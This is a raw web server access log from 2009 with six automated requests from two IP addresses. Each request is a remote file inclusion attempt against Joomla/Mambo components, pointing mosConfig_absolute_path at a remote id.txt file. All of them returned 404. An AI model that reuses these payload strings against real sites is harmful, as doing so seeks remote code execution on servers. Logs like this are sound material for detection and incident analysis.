218.55.227.145 - - [06/Jun/2009:02:04:19 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/superscan/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.55.227.145 - - [06/Jun/2009:02:04:19 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/superscan/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.55.227.145 - - [06/Jun/2009:02:04:20 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/superscan/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
217.73.161.62 - - [06/Jun/2009:02:04:33 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:02:04:33 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:02:04:34 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
